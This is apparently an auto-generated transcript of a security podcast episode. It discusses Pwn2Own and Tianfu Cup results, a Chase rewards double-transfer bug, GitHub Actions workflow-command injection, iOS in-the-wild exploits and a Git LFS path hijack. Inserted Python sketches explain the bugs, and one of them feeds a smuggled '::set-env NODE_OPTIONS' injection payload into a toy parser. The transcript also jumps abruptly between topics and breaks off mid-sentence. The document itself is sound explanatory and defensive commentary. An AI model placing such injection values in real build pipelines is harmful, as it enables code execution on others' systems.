Episode 52 - Pwn2Own, Tianfu Cup, and Other Hacks
This transcript is automatically generated, there will be mistakes
Hello everyone, welcome to another episode of the Day Zero podcast. I'm Specter; with me is zi. Today we'll get into some news around some of the pwn events that have been happening over the last week, as well as a mixed bag of other CVEs. Before we get into that though, I will quickly shill our discussion video that will be dropping this week on Thursday at 8:00 a.m. Eastern. We have a guest on it, Drew G, who some of you who are in our Discord may know; he's a moderator of our Discord, which you can also check out, we have a link in the YouTube description as well as on Twitch. The video's about life in the security industry and the types of jobs that are available there. So yeah, make sure to check that out when it drops on Thursday. With that said, let's talk about Pwn2Own. So Pwn2Own WD Cloud edition, or sorry, Tokyo, took place last week. It was a three-day event hosted live from Toronto. So you can notice with the name it's a little bit weird: it's Pwn2Own Tokyo, live from Toronto, and that's obviously because of the crazy COVID stuff, they couldn't actually host the event in Tokyo this year as usual. When covering Pwn2Own we'll cover some of the targets hit, we won't cover all of them, and then we'll cover some of the final results and thoughts. So on day one there were a few teams. STARLabs targeted the Netgear Nighthawk R7800 router; they managed to gain code execution on the LAN interface. Trapa Security and 84c0 targeted the Western Digital My Cloud Pro series, and there was some collision on that: 84c0 got no points because it was already previously reported. And the Viettel cybersecurity team targeted the Samsung Q60T TV, but they used a known bug. On the second day there was even more collision with the WD My Cloud Pro, which is why I kind of worked that into the way I introduced it. Team Bugscale had a collision with the WD My Cloud Pro. F-Secure Labs also hit the Q60T as well as the [unintelligible].
Um, and they also used a known bug. There might have been a collision there, but they don't say that it was previously reported in Pwn2Own, so it might have just been a different known bug. And then another researcher, Sam Thomas, also targeted the WD My Cloud Pro. On the third and final day, DEVCORE targeted the My Cloud Pro as well, using six different bugs, two of which were already used in Pwn2Own, so that resulted in five collisions on the WD My Cloud Pro. And then finally, STARLabs popped the Synology DiskStation NAS with a race condition. So in terms of results, Team Flashback won with four Master of Pwn points, DEVCORE came second with three and a half, and Trapa came third with three. Overall they were awarded roughly $137,000 for 23 unique bugs. There were a lot of partials this year; I think in total the counts were eight successes, nine partials, and two failures.
The thing with Pwn2Own, I thought it was kind of disappointing in the sense that all of these targets were IoT. They were kind of soft targets, in my opinion. Pwn2Own Tokyo, for those who have been familiar with Pwn2Own in the past, used to be Pwn2Own Mobile, so, you know, hitting iPhone and Android and stuff like that. Yet in this competition there were no phones hit, no browsers hit, no operating systems hit, nothing like that. It was all, like, TVs and routers.
This is basically, like... was it... I want to say Pwn2Own Miami last year was their IoT one. So it might just be that they're kind of rotating it around, or maybe, you know, Tokyo is always going to be like this. But I mean, it's not like Pwn2Own hasn't done an IoT one before. Yeah, they're all IoT, somewhat of an easier target. That said, I mean, the companies getting involved here are at least making an attempt at securing their IoT devices.
Yeah, it was just a little bit disappointing in terms of targets, because they do still feel like soft targets. Now, the other thing that I found interesting was Fluoroacetate didn't compete in this event, and why that's notable is in the previous Pwn2Own events we've covered, the duo... Richard, I forget the other person's name, but there's basically a
Duo. I don't believe they competed in the other IoT one, the last IoT Pwn2Own.
neither. Okay, I know they did participate in one we covered this year. But anyway, yeah, we
cover mobile and
like browser. Yeah, but when they participate they absolutely dominate; they take first place in everything, and with their lack of participation in this event, the results were a lot closer. So, you know, there was a little bit more competition there at least. But it also seems like there was a lot more collision this year than years past, probably because of those softer targets; potentially, you know, easier bugs, easier to find, more valuable to report than harder-to-find ones. I feel like it might be in ZDI's interest to limit target selection down more for future events, or just have like one IoT event in the year or something, because I really had like no interest in following this event as I saw the targets coming out. I don't know how you feel about that idea. It could just be because, one, Chinese teams aren't allowed to compete in Pwn2Own anymore, and it seems since that's been the case, it's now teams just thinking, what's the softest target I can hit with the least amount of effort to try to squeeze out like 5K or something. And if Pwn2Own events continue with these less interesting targets, I might just stop paying attention to them, really. Maybe I'll check out the results at the end, but like, I used to follow Pwn2Own results live because I found them so interesting, and I just didn't really care much, honestly, this time around.
I mean, to some extent I can agree, but at the same time I think this is more an example of just Pwn2Own growing. So now it's not only, you know, browsers, not only some phones; they've continued to grow and are having, you know, other industries interested in actually participating in that, and, you know, allowing their devices to be attacked in this sort of competition, highlighting their own vulnerabilities so they can get that information and pay out on them. I think it's just an example of them growing; some people have different interests, and there's still going to be the Pwn2Own where they're covering the browsers, where they're covering some harder targets.
Well, that's the thing though, this was supposed to be that. If you look at the announcement for Pwn2Own Tokyo, they even say right in the announcement that the big focus of it is phones, and they list the phones that are allowed targets, like the Android phones and stuff like that, and also the iPhone 11 if I remember correctly. It's just that none of the teams wanted to hit that
Which I find kind of interesting, that they're not hitting the phones. Um, I just assumed, given what was being hit, that this was that IoT Pwn2Own or similar. I think it was Miami; I might be mistaken about that, but Pwn2Own has had like an IoT one before, so I just thought that was this. If they announced this as being something other than that, or having all the phones involved, and teams are choosing not to hit them, that is actually, I think, worth a bit more discussion. I did notice that I didn't look at how this one was actually announced. You happen to have the link for
that? Yeah, I do, I'll actually bring it up on screen now. So in the announcement thread you can see they have the target handsets: the Pixel 4, the Galaxy S20, the iPhone 11, the Huawei P40. And they also have the smart tech, right, like the wearables and the televisions and routers, but those were kind of the secondary targets. It seemed like they had the phones on the top; that's what they wanted people to target. It just seems like teams didn't want to put all the effort in, because obviously hitting those phones is harder than hitting these little dinky IoT devices, right? And that's what I think happened: the teams didn't have any interest in hitting those handheld devices, because it was just, I guess, more effort for what you could potentially get. If you're just going for the Master of Pwn points and winning Pwn2Own, then it's probably more worth it to just hit the easier targets to try to rack up more points than hitting a big target. But yeah, like, that makes the event a little bit less interesting for me, and it feels like the target was kind of missed on what Pwn2Own wanted. You know,
what Pwn2Own wanted, I think, is, you know, essentially what the viewers of Pwn2Own wanted, if you want to call them that. I guess this time they did stream, but it's not exactly a spectator-friendly sport or anything like that; it's not like watching races. But one of the interesting things about Pwn2Own has been seeing, you know, those harder exploits coming out of it. Yeah, so, like, I agree, it's definitely disappointing to see teams weren't going for that. There could be multiple reasons behind that. Perhaps it's just that teams were going for it and couldn't find vulnerabilities; I find that somewhat unlikely. Yeah, it's a possibility. I do find it somewhat unlikely that that's the case given past performance. Like, I can't imagine,
you know, it's now suddenly nobody's able to find anything.
It could be the value of these exploits has gone up on, like, the gray market.
I think that's a more likely factor, the fact that people don't want to burn these bugs at Pwn2Own and the value's increased.
At the same time, you do have companies like F-Secure; they kind of make their money off of having that research coming out. So Pwn2Own's a good place to kind of be able to do that research, still get some money, get the, I guess, notoriety for it, while still kind of staying on the disclosure side of things rather than selling off to the gray market. So there are incentives for companies, like the research teams, to still do that. The ones who would be selling off to the gray market: like, it makes more sense when talking about the individual participants rather than those that do have, like, company
backing. Yeah, obviously we can only speculate. I could also see this event being disappointing from a company standpoint, like enterprise, because, and I think I've talked about it before, companies do use Pwn2Own as a metric or window to see how they're doing in terms of their security stance. So if they get popped at Pwn2Own, they know, okay, we need to improve on this area, wherever the bug might have been found, or something like that. There are definitely useful insights that companies get besides just the bug reports. But obviously, where they didn't hit those phones, Google and Samsung and Apple and these companies aren't going to be getting those insights, because there's nothing to be had there. So I can see it being disappointing from their perspective as well. What I think was a much more interesting event, though, and where people had their attention focused, was the Tianfu Cup, which is the Chinese-based event, which is where some of those teams that used to participate in Pwn2Own had to move to. So the Tianfu Cup also took place last week; it started on November 6th, and I think it was also a three-day event, if I remember, or it might have been two days, actually, looking at the Twitter that you pulled up. But some of the targets that were hit were very big targets: iOS 14 on an iPhone 11 Pro, the Galaxy S20, Windows 10 was even hit, version 2004, which was I think the August update, Ubuntu, Chrome, Safari, Firefox, Docker, even VMware and QEMU were hit, so the virtualization stuff was hit as well. So a lot of interesting targets were hit. The winning team from last year came around to win again, which was Qihoo 360; they came home with seven hundred and forty-four thousand dollars out of the 1.2 million dollar prize pool. So the prize pool here is also a lot larger than Pwn2Own's. AntFinancial Lightyear Security Lab came second, what a name by the way, and an independent security researcher, it seems named Peng, came in third.
This target list kind of blows Pwn2Own out of the water in terms of everyday devices that people use, and many interesting targets, and exploits will probably be coming out of this. Now, technical details aren't known for most of the findings; many of them probably haven't even had fixes shipped yet. So those will probably come in, like, the days and weeks ahead. We might see some write-ups or something after they've been patched; we can only guess on that, though. People might have to go commit-surfing to find the actual bugs that were fixed, but there are definitely people with their eyes peeled here to see if zero-days got burned, because of that target list, you know, when you see those targets. Yep.
It'd be interesting to know, like, what involvement the companies have with the Tianfu
Cup? That I'm not sure on. The Tianfu Cup I know less about on the logistics side of things.
Yeah, I mean, being English speakers in this world, we can't really read it.
Yeah, like even the results for it are hard to read; we had to go off translations for some of the top teams. Yeah. I mean, ZDI I think is a little bit more transparent when it comes to how they interact with vendors. Like, I don't know, it's a little bit weird right now with COVID, but before COVID the vendors were on site at the ZDI event to, you know, talk to the researchers and get information about the issues to fix them. I don't know if that's the same situation with the Tianfu Cup. I imagine the vendors still have some kind of communication channel, but I don't know if they have that same kind of interaction with the researchers directly. That could be interesting; like, if somebody listening knows that, definitely leave a comment, because I'd be interested to hear about it. But yeah, to answer your question, I'm not totally sure how that process works, logistically. But what I think this competition goes to show is just how much these Chinese teams are killing it in the bug competition space. When they got banned from going to Pwn2Own, this event kind of became the new top event to look at, in terms of the gray market looking to see if zero-days are getting burned, and probably for vendors too, with what I was saying with Pwn2Own, getting some insights into where they might want to address potential issues in the codebase and stuff like that. So yeah, the Tianfu Cup was a lot more interesting than Pwn2Own in my opinion, and I hope we'll be able to get to see some of the bugs and exploits that came out of it.
It would be nice to see them but being Chinese teams, I can also imagine we'll get Chinese
write-ups. Yeah, I mean, Translate will be able to help, although Chinese is difficult to translate from automatically. So we'll see how it goes. I've done some
translated write-ups like that a lot gets
lost. Yeah, yeah. It's weird; the language barrier between English and some of the Asian languages like Japanese and Chinese is a lot greater than, let's say, English and French, for example. But yeah, hopefully we'll still get to see some details. So we'll move into some exploits. This one is an old issue that only recently got posted about due to fear of retaliation, so, you know, it's an interesting story right out of the gate. It's a bug that allows you to get unlimited Chase Ultimate Rewards points. There's not many technical details here; this story is a bit more political, or drama, in a sense. The researcher discovered the issue in November of 2016, and they found that when they transferred balances between accounts for the Chase Ultimate Rewards points on the Chase Bank site, and did that on an unstable internet connection, a double transfer would occur. So if you transferred from one account to the other, one account would end up with double the amount of the transfer, and the other account would get double the amount deducted, so it would go to, like, a negative point count, for example, if the point count was low enough. And we've talked about some similar types of issues in the past, usually induced by race conditions.
Yeah, this one is a little bit interesting on that part, though, because they do say it's when they have an unstable internet connection. So, like, often with race conditions you're sending multiple requests kind of rapid-fire, but if you're having an unstable connection, more likely things are being dropped. So the thing I think of is, like, a retransmission, but that's, you know, done at the TCP level, so no server should be seeing that as, like, two actual separate requests. So unless something else was causing it, like, okay, the request failed, therefore try it again, which doesn't seem to be the likely case here. So I do find it interesting that it was the unstable connection that resulted in this.
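To make the speculation above concrete, here is a minimal, purely hypothetical Python sketch (nothing to do with Chase's real backend; all names are made up) of how a transfer endpoint with no idempotency key ends up double-applying a retried request:

```python
import threading

# Hypothetical sketch: a transfer endpoint that applies a balance move with no
# idempotency key. If the client retries after an unstable connection drops the
# response, the same logical transfer is applied twice, and nothing stops the
# source balance from going negative.

balances = {"alice": 100, "bob": 0}
lock = threading.Lock()

def handle_transfer(src, dst, amount):
    # No request ID / idempotency token: every call is treated as a brand-new
    # transfer, so a duplicate submission double-applies.
    with lock:
        balances[src] -= amount
        balances[dst] += amount

def client_transfer_with_retry(src, dst, amount, response_lost=False):
    handle_transfer(src, dst, amount)      # first attempt reaches the server
    if response_lost:                      # client never sees the reply...
        handle_transfer(src, dst, amount)  # ...so it retries: applied twice

client_transfer_with_retry("alice", "bob", 100, response_lost=True)
print(balances)  # {'alice': -100, 'bob': 200}
```

The standard defense is a client-supplied idempotency key that the server remembers, so a retried request is recognized as a duplicate rather than replayed.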
Yeah, it's similar in the end result to what we've seen with race conditions in the past, but like you said, the unstable internet connection is weird. I wish we got a little bit more technical detail on that aspect. But yeah, like I said, it mostly goes into more of the political side of it. So since this was tied to a bank, Chase, they didn't want to tread any dangerous ground. So initially, in 2016, they tried to report the issue through Twitter, because at the time Chase didn't have a bounty program. They responded and gave him permission to test, and when he did, the PoC actually worked, so well that he essentially managed to create five million reward points, which was equivalent to seventy thousand US dollars. So this is an insanely impactful issue from a financial standpoint. And then the researcher took it further to test whether those points could actually be withdrawn, which was possible. So after they wrote that PoC and confirmed the points could actually be used and be financially damaging, they sent all that information over to Chase, and Chase initially stated that they'd fix the issue, and it seemed to be going well in terms of the interaction. Then a week later they got an email saying they can't disclose the information; apparently it was a pretty hostile message. And years later, they sent an email stating they were closing all of the investment and banking accounts associated with them, including five credit cards he'd had with them for years. So, yeah, like, they took it in stride. I'm sorry, I want to jump back
a little bit, when it came to kind of the process here and the disclosure process. He did get permission before he tried to actually claim those points. Yeah, like, he did go back; he had first sought permission to do, like, some testing, but then, I also want to make clear, before he actually tried to use those illegitimately gained points, he did also kind of get further permission from Chase to do that, or at least he believes he did. Some of that comes out from the Reddit thread where the author was talking about this. I just wanted to point out that on the disclosure side, like, he did take, I'd argue, a lot of the right steps towards doing this disclosure, especially since they didn't have a disclosure program in place.
Yeah, I think so as well
His accounts have now been deleted, as you were saying. It's unclear if it's related to this or not; he seems pretty certain that it is related. Although, you know, it's been four years, and to only now be taking
kind of a punishment
against it does seem a little bit on the strange side, but he hasn't provided any other reason, and I can't expect Chase to provide any
reason. Yeah, I mean, it's worth noting that this should be taken with a bit of a grain of salt, because this is only one side of a two-sided story, obviously. Yeah, and like you were saying, it happening years later does seem weird. At the same time, banks usually don't just terminate your accounts out of nowhere, and if there's nothing else that he did that would warrant that termination, it seems likely that it would be connected to that initial report, especially if they did react hostilely towards it initially. Obviously, we don't know all the details, but banks are kind of known for being vindictive when it comes to breaking their stuff. Now, I will say, for something this financially damaging, I think it might have been in the best interest of the researcher to ask for a more legally binding permission to test this, maybe something with a signature instead of just a Twitter DM. I don't know what you think about that, because, like, a Twitter DM from their account is technically written permission. I just feel like if it ever went to, like, a court or something, it could easily be challenged, like, "our Twitter account was hacked" or something stupid like that, whereas with a signature it's a lot harder to claim something like
that. If their Twitter account was hacked, it would still be the case that he was operating under the belief that he had permission to do so, and that intent not to commit a crime, even though the belief was false, like, that does matter, no? Because he had taken some steps, that due diligence, towards ensuring that he was acting appropriately. Again, always have to preface this stuff by indicating, like, I'm not a lawyer, but in my understanding, like, that intent does matter. So we kind of had this come up when we were talking about the pen testers who got arrested doing a physical assessment against some of the state buildings. Like, they believed that they had permission to be doing their assessments, and they weren't charged with anything actually related to that; it was downgraded to something, I can't remember what the crime they actually got. I think honestly
they were going to charge them with B&E, but then they downgraded it to trespassing or something.
It was trespassing, yeah. We'd have to go look back at the actual report on it, but it did get downgraded, largely because, like, they were operating with the belief that they were performing legal work, which does change kind of how the blame comes out. Obviously, the person giving permission who shouldn't have kind of gets some of the blame in that case; it doesn't just fall on the pen tester, who had reason to believe that they were operating legally. Um, in this case, it is worth also noting, like, this guy isn't a pen tester, he's a developer, so he's not really coming at it from that same perspective. I think it's fair, like, if you can, like, get more permission than just a Twitter DM. Though at the same time, I'd argue it's at least sufficient for some things. Like, if this were, say, a SQL injection that was going to dump data, obviously you probably want more; especially when it comes to banking information, you're probably going to want a lot more, or a lot more solid of a permission structure in place. Something like this, where you're basically just generating points out of thin air...
Again, he's gaining a benefit financially, but it's not hitting other people's data or anything, or their accounts.
Yeah, and it's something that should be easily rectified on their side, like, by removing it; it's not an actual breach of data. Yeah, I don't know. I think it's definitely a fair question to ask, and I don't know where I would draw the line. I don't feel like this guy operated poorly, though. Like, I don't think he absolutely should have gone further on it; I think going further would be a good idea in terms of information, but I don't think what he did was wrong.
Yeah, exactly. I don't think this excuses the apparent behavior of Chase here, obviously. I will close out here by saying, though, we don't know all the details. Obviously, we only have the blog post and the author's comments on Reddit that zi dug up to be able to comment on, so there could be more to the story that we just don't know about. And it actually seems like that is kind of likely, because there are some weird aspects of the story, like the that-many-years-later termination of the accounts. So
yeah, the termination seems like there's definitely more to this that we're just not hearing. That said, we're not going to hear from Chase; like, I wouldn't expect a company like Chase to issue a statement regarding somebody's personal account and why it was closed.
Yeah, no, no chance. So yeah, we can move on from that. So we have a GitHub issue reported by Google Project Zero. This is in GitHub Actions. For those of you who don't know, GitHub Actions facilitates continuous integration, and that is done via workflows and commands that are inside of them. The way GitHub processes those workflow commands is by parsing the stdout of the executed actions to look for command markers; in v2 that's the double colon, and in v1 the double hashtag. One of the commands they support inside workflows is the ability to set environment variables, which seems somewhat reasonable, because environment variables are used in build scripts and stuff pretty frequently. But as the report author points out, there is a susceptibility to injection here if an attacker can influence stdout at all, because they can then just inject commands into it that will get parsed. So if any untrusted data can get to stdout, one can set the environment variables, for example, to achieve remote code execution, usually as soon as another workflow is executed. One example they give is the VS Code repository. They have a workflow for newly opened issues, and the purpose of that workflow is to copy issues into other repositories, and the issue title is printed to stdout, which can then be used for command injection. So you can open an issue on the repository and create a title that would override environment variables via that command I talked about earlier. One example they give is overwriting the NODE_OPTIONS environment variable, which allows them to set an experimental loader that will execute a potentially malicious payload. So the biggest issue with this vulnerability is that it's not just a bug or, like, a technical oversight; it's an inherent design flaw with how they parse commands out of stdout and inherently seem to trust the output of that stream, for whatever
reason. It's a design choice, for sure, that they've decided on; like, they wanted to support adding environment variables. And to be fair, this isn't, like, arbitrary command injection; there are specific commands that are supported here, such as, as Specter said, set environment, or set-env. The other one that could be used for something, exploit-wise, is add-path, which of course adds, that's a good one, adds something to the path of binaries that are going to be looked up. So you've got those two as the main ones pointed out. It is also worth mentioning, and this matters, I believe, for the VS Code one, that you can only do kind of one injection at a time. In the VS Code case, that's because, sorry, in version one you can kind of have commands inline, I believe. Yes, in version one commands were kind of inline: you just do the double hashtag and then all the command information. In version two you do the double colon, but the double colon has to be at the start of the line. And actually, I guess I am mistaken: for VS Code it looks like you could possibly do multiple, since they're using version one. But I believe they call out one case where they weren't able to get an exploit as easily because of that requirement that it be at the start of a line.
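To illustrate the pattern being described, here is a simplified Python sketch of a runner that scans each stdout line for v2 `::` command markers. This is not GitHub's actual runner code, and the payload path is made up; it just shows how untrusted text that reaches stdout gets interpreted as a command:

```python
# Illustrative sketch of the vulnerable pattern: a runner parses every stdout
# line of a step for v2 workflow commands ("::command key=value::data").
# Because anything a step prints is trusted, untrusted input that reaches
# stdout can smuggle in commands like set-env.

env_updates = {}

def process_stdout_line(line):
    # v2 commands must start the line with "::"
    if line.startswith("::set-env name=") and "::" in line[2:]:
        header, _, value = line[2:].partition("::")
        name = header[len("set-env name="):]
        env_updates[name] = value  # attacker controls both name and value

def run_step(stdout_lines):
    for line in stdout_lines:
        process_stdout_line(line)

# A workflow step that innocently echoes an attacker-chosen issue title:
issue_title = "pwned\n::set-env name=NODE_OPTIONS::--require /tmp/evil.js"
run_step(f"New issue: {issue_title}".splitlines())

print(env_updates)  # {'NODE_OPTIONS': '--require /tmp/evil.js'}
```

Since NODE_OPTIONS is honored by any Node process started afterwards, poisoning it is enough to run attacker code the next time the workflow invokes Node.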
So, because of the fact that it's an inherent design flaw, the author even stated, "I'm not really sure of the best way to address this issue." They stated a good long-term fix would be to move workflow commands to some out-of-band channel to avoid parsing stdout, so opening, like, a different file descriptor, but they note that would break existing code, so it's not really the best solution either. And because this issue is so difficult, you can see in the timeline how this issue still hasn't fully been addressed. They reported the issue to GitHub on July 21st. On October 1st, GitHub issued an advisory deprecating the vulnerable commands, presumably the commands to set environment variables; they weren't really totally clear there. Then GitHub requested an additional 14-day grace period on October 16th, on top of the 90-day one that was already issued. And then on November 1st, they said they won't be disabling the commands by the time of disclosure; they wanted another 48 hours to notify customers and determine a hard date for disabling the commands mentioned. But Project Zero basically stated they already granted one extension and they're not going to grant another one, so disclosure would still happen on the 2nd. And so it did.
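The "out-of-band channel" fix direction mentioned above can be sketched like this. The function names and the simple NAME=value file format are assumptions for illustration, not GitHub's actual implementation; the point is only that commands read from a dedicated file can no longer be forged by text printed to stdout:

```python
import os
import tempfile

# Sketch: instead of scanning stdout, the runner hands the step a dedicated
# file path and only reads env assignments from that file. Untrusted text on
# stdout is now inert.

def run_step_with_env_file(step):
    env_updates = {}
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        step(path)  # the step writes "NAME=value" lines to the file it was given
        with open(path) as f:
            for line in f:
                name, sep, value = line.rstrip("\n").partition("=")
                if sep:
                    env_updates[name] = value
    finally:
        os.remove(path)
    return env_updates

def step(env_file):
    # Untrusted data echoed to stdout is harmless now:
    print("::set-env name=NODE_OPTIONS::--require /tmp/evil.js")
    with open(env_file, "a") as f:
        f.write("BUILD_TYPE=release\n")  # deliberate, trusted assignment

print(run_step_with_env_file(step))  # {'BUILD_TYPE': 'release'}
```

The trade-off the author flags is backwards compatibility: existing actions that emit stdout commands would silently stop working under a scheme like this.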
Yeah, which I think is fair; like they say, they did already offer an extension, they had their grace period, they had 90 days beforehand to deal with it. It does sound like there was a communication issue where they didn't get any response. I don't think Project Zero is the type of team that usually just gets ignored. Yeah, it wasn't optional. So I mean, I'd say, you know, there's a chance that, like, somebody just left and was no longer monitoring the email or something. Obviously I have no idea what happened there; I just doubt they were intentionally being ignored. So it kind of sucks for GitHub, but yeah, they had their time to deal with it.
Yeah, I mean, I don't think Project Zero has ever granted more than one extension. I think we've covered some issues before where people were unhappy with Project Zero for not extending, but I don't think they want to set the precedent that they can be pushed around to extend deadlines more than once, which
we talked about: the changes to their disclosure policy, I think at the beginning of this year. They made some changes where, like, the 90 days just became the default, they weren't going to release early, and it was going to be a lot harder in terms of the extensions. So this is just evidence that they're basically keeping to exactly what they said, and I mean, I had no reason to think they
wouldn't. Yes, sticking to their guns. This is a potentially massive, sweeping issue that could be abused, which is why, even though we're just talking about how Google is sticking to what they've said, I feel like this is one case where extending the disclosure deadline might have made more sense, just because it can affect so many projects. It's not an issue that just affects one vendor; it can affect, like, any vendor that uses GitHub Actions on their public repositories. So
it impacts a lot of projects, but it's one platform that's impacted; like, GitHub could in theory centrally fix this.
It would just piss off a lot of people.
How to fix it is kind of a different question. You kind of mentioned that they've now deprecated it and it will be disabled in the near future. I think another thing would be whitelisting, like setting a whitelist of environment variables that can be set; that might be another option. That would be something you could roll out in a way that won't break old code: if it has no whitelist, maybe it defaults open for a while, and then eventually just doesn't work until you set your whitelist. That might not work for everybody if you need, like, wildcards, but I do think some sort of listing in there would be a better way, at least, to deal with the environment variables. I'm not sure about dealing with add-path. But I do feel like there are ways they could have gone about this without just deprecating it. It is a difficult thing to solve, though, because, like, obviously they intended these commands to be used and to have value. The only other thing I can think of is maybe including some sort of token with it to kind of indicate its integrity; it's just, you can't really hard-code that, it needs to be something that all the processes involved can know, maybe, like, some sort of signed value. I don't know, I'm just kind of tossing out a few ideas on that. It's definitely an interesting problem, though, because it is a feature that is useful, and removing it does seem a little bit
extreme. Yeah, yeah, it's an almost impossible-to-solve issue without just disabling it outright. But that being said, like I said, I do think extending the disclosure deadline might have made sense. At the same time, that two-month gap or so in the timeline seems like a lot of time that was potentially wasted on GitHub's side. Like, they were really late on deprecating those commands: they deprecated them in October and it was, you know, reported in July. So there is a gap there that probably should have been filled quicker; that way the deprecation would have had a longer time window before they could disable the commands, and they could have potentially disabled them before this report even went public. So it seems like a bit of a mess
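To make the injection being discussed concrete, here's a toy Python model of the old `::set-env` behavior, plus the whitelist idea floated above. This is a simplification for illustration only, not GitHub's actual runner code:

```python
def process_log_line(line, env, allowed=None):
    """Toy model of the runner's old '::set-env' handling (a simplification
    for illustration -- not GitHub's actual runner code)."""
    prefix = "::set-env name="
    if line.startswith(prefix):
        name, sep, value = line[len(prefix):].partition("::")
        if not sep:
            return  # malformed command, ignore it
        # Original behavior: any line reaching the log could set any variable.
        # The whitelist idea discussed above would at least scope the damage:
        if allowed is not None and name not in allowed:
            return  # variable wasn't declared up front, reject it
        env[name] = value

env = {}
# Untrusted content (say, an issue title) echoed into the build log:
process_log_line("::set-env name=NODE_OPTIONS::--require /tmp/evil.js", env)
print(env)  # attacker-controlled variable lands in the build environment

env2 = {}
process_log_line("::set-env name=NODE_OPTIONS::--require /tmp/evil.js",
                 env2, allowed={"BUILD_ID"})
print(env2)  # {} -- rejected by the whitelist
```

The point of the sketch is that the dangerous step is parsing workflow commands out of arbitrary stdout; a declared whitelist narrows which variables untrusted output could ever touch.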
there. Yeah, for sure. I mean, that's absolutely on GitHub. I don't know what the communication issue was, but that is definitely on GitHub and they should have been a bit more on top of that. But we also don't know what caused it, so it's hard to really come down and try to blame them. GitHub doesn't seem like the type of company that's just regularly going to have issues like this. Although, now that I'm thinking about it, in one of our last episodes we had another issue where GitHub was kind of slow to respond.
I can't remember. We've covered quite a few GitHub issues
lately. Yeah, just lately, cuz we were mostly covering GitLab for a
while. Yeah, the last three or four episodes we've probably covered maybe four GitHub issues. It's been pretty crazy; I don't know why there's such a sudden focus on them. But yeah, there
is... no, I mean, there's definitely been some interesting vulnerabilities coming out,
although, just quickly looking at my notes, I'm not seeing any case where GitHub wasn't fairly responsive. So I might be thinking of somebody else with
that. Yeah, yeah, nothing comes to mind for me either. That said, we'll move on to Apple. So Apple put out a security notice about iOS 14.2 and iPadOS 14.2. This was basically a batch of security fixes; you can see they have a bullet-point style list of all the issues that were addressed: a few audio issues and font parsing issues, some kernel memory corruptions. What was notable about this advisory, though, let me just find exactly where it was... Project Zero found a few of these issues. I think they found a font parsing issue and a kernel issue, and they discovered that those were being exploited in the wild. They even say in the impact that Apple is aware of reports that an exploit for this issue exists in the wild, and it looks like it's a full chain. Usually when you look at a full chain for something as big of a target as iOS, it's probably nation-state. So yeah, might be a good idea to update your iPhones, because it's not every day you see in-the-wild issues exploited, especially in Apple's case. Usually those exploits are very valuable because Apple is so locked down when it comes to sandboxing and stuff. So the fact that there's a sandbox-reachable issue that can then be escalated to the kernel... yeah, you probably want to
update. So yeah, I think it's also worth mentioning here that Shane Huntley, who I believe is the director of Google's Threat Analysis Group, did mention that these are not related to any election targeting. In the reporting by ZDNet, they specifically say that Shane confirmed these are related to the recent set of three exploits, the recent Chrome zero-day we covered last time. That said, they link to this tweet, and the tweet does not say that. So there might be another source for that, or it might just be a misunderstanding of what's being said here, which is that it's similar to other recently reported 0-days. Which I do think is kind of an interesting aspect, especially if it is related to those Chrome 0-days, like being used in the same
campaign. What would be weird, though, is when you're talking about iPhone: Chrome is more of an Android thing, right? Chrome is... yeah, well, fine, Android and iPhone.
Yeah, exactly. And even the Chrome application on iOS uses WebKit in the back end. I think it doesn't use Chrome's typical back end with V8 and whatnot; at least that's what I remember hearing a little while back, I don't know if that's changed or not. But those factors do make it seem unlikely that it would be chained with the Chrome one. It would not really be possible to chain the two and connect them.
Not necessarily chained. Being part of the same campaign doesn't mean they're being chained together, because there are targets that they're hitting, like it's the same group using these kind of at the same time. Like, if somebody has an Android device, they're going after it with the Chrome one; if somebody's using an iPhone, they're going after the iOS device. That's all I mean by the relationship in the campaign being there, or possibly being there. Not so much that you would chain the Chrome 0-days with that, because, like you're saying, that's not really going to work out, just because iOS is basically all WebKit. Out of chat, there is a curious viewer who says: unless you want to root your iPhone, then don't update. I will say you might also not want anybody else to root your iPhone for
you. Well, the cool thing about some jailbreaks, though, is they will use those bugs as entry points, and then post-jailbreak they'll actually monkey-patch them out, which is really cool. So you could potentially use this issue and still be safe from the underlying bugs, but that's neither here nor there.
Well, I mean, it is kind of an interesting discussion. When you have your phone rooted, you are opening yourself up to attackers. If you want to root it, like, there's absolutely valid reasons to do that and use a rooted phone, so by all means, you're welcome to. But if you want to be more secure, I think part of the argument would have to come down to keeping things updated rather than rooting. Although there is probably an argument to be had on the other side, that you can definitely implement some of your own security if you were to root your device, though most users probably aren't doing
that. So actually, can you do that to, like, delete messages? It seems like this is only really intended to be more of a display thing. If you notice, this is under the layout and custom scripts area. It seems unintended that you're able to turn on node integration, for example, or set this up as a preload script, since the fix for that effectively disables that by only using the features argument, basically, if you're on a Jitsi
domain. Okay, yeah, I skipped over the fact that it was in the layout section, so okay, fair enough. So yeah,
that I don't think that's
yeah, since, I mean, the fix basically ended up being that one line being added that just emptied out the features, unless you're going down the more trusted path,
basically. Yeah. So, Git LFS, more issues. Git Large File Storage also had an RCE published last week. Git LFS is an extension for versioning large files: it takes large files that would typically bloat a repository, like videos or binaries or whatever, and replaces them with text pointers inside Git while storing the file content on a remote server. So it's a potentially very useful extension. The problem is they don't supply a full path to the git binary when executing a new git process. So again, it's a classic hijack due to an incomplete path; we've covered many such issues on the show before. By placing a malicious git executable in the main repo's directory, you can get that executable executed on a victim machine instead of the real git executable. So, like the title suggests, this is technically an RCE. That being said, you would need the ability to push the malicious file into the main repo, so the impact isn't as high as you might immediately think if you just read the title. But yeah, still though, it still
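The incomplete-path pattern can be sketched in Python as an illustration of the class of bug; Git LFS itself is written in Go, and this is not its actual code:

```python
import shutil
import subprocess

def run_git(args, repo_dir):
    """Run git inside an (untrusted) checkout. A sketch of the fix, not Git
    LFS's real code: the vulnerable pattern is effectively
    subprocess.run(["git", *args], cwd=repo_dir), where on Windows a
    git.exe/git.bat sitting in repo_dir can win the executable lookup."""
    # Resolve an absolute path from PATH *before* touching repo_dir,
    # instead of trusting the platform's per-process lookup rules:
    git = shutil.which("git")
    if git is None:
        raise FileNotFoundError("git not found on PATH")
    return subprocess.run([git, *args], cwd=repo_dir, capture_output=True)
```

The design point is simply that the absolute path is pinned down once, outside the attacker-influenced directory, so nothing committed into the repo can shadow the real binary.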
is an RCE. Could you not exploit this, say, with somebody cloning and then working on the repo, perhaps?
Like a fork.
Well, yeah, a fork would be another option too. But if somebody just cloned your repo and then, like, did local work on it, didn't necessarily push it... well, yeah, I'm just trying to think about what the attack vectors would
